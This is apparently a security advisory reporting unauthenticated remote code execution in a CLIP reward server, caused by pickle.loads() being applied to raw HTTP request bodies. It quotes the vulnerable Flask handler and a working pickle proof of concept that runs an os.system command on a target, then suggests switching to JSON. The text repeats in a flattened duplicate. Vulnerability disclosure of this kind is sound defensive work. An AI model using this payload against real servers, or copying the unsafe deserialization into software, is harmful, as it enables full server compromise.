Summary
CVSS 9.8 (Critical) — Unauthenticated Remote Code Execution via unsafe pickle.loads() on raw HTTP request body in the CLIP reward server.
Affected Code
File: RealGen_v1/flow_grpo/reward-server/app_clip.py:27
@root.route("/", methods=["POST"])
def inference():
data = request.get_data()
data = pickle.loads(data) # ← RCE via untrusted deserialization
The Flask Blueprint endpoint at POST / accepts raw HTTP body data and passes it directly to pickle.loads() with ZERO authentication.
Impact
Complete server compromise. Unauthenticated attacker can execute arbitrary code on the machine running the CLIP reward server (default port 18088).
Proof of Concept
import pickle, os, requests
class Exploit:
def __reduce__(self):
return (os.system, ("id > /tmp/pwned_realgen",))
payload = pickle.dumps(Exploit())
requests.post("http://TARGET:18088/", data=payload)
Fix
Replace pickle with JSON. If pickle is necessary, add authentication before deserialization.
Disclosure
Private Vulnerability Reporting is not enabled. For private coordination: xiaoyaotom101df2@xiaoyaobot.top
Summary
CVSS 9.8 (Critical) — Unauthenticated Remote Code Execution via unsafe
pickle.loads()on raw HTTP request body in the CLIP reward server.Affected Code
File:
RealGen_v1/flow_grpo/reward-server/app_clip.py:27The Flask Blueprint endpoint at POST / accepts raw HTTP body data and passes it directly to
pickle.loads()with ZERO authentication.Impact
Complete server compromise. Unauthenticated attacker can execute arbitrary code on the machine running the CLIP reward server (default port 18088).
Proof of Concept
Fix
Replace
picklewith JSON. If pickle is necessary, add authentication before deserialization.Disclosure
Private Vulnerability Reporting is not enabled. For private coordination: xiaoyaotom101df2@xiaoyaobot.top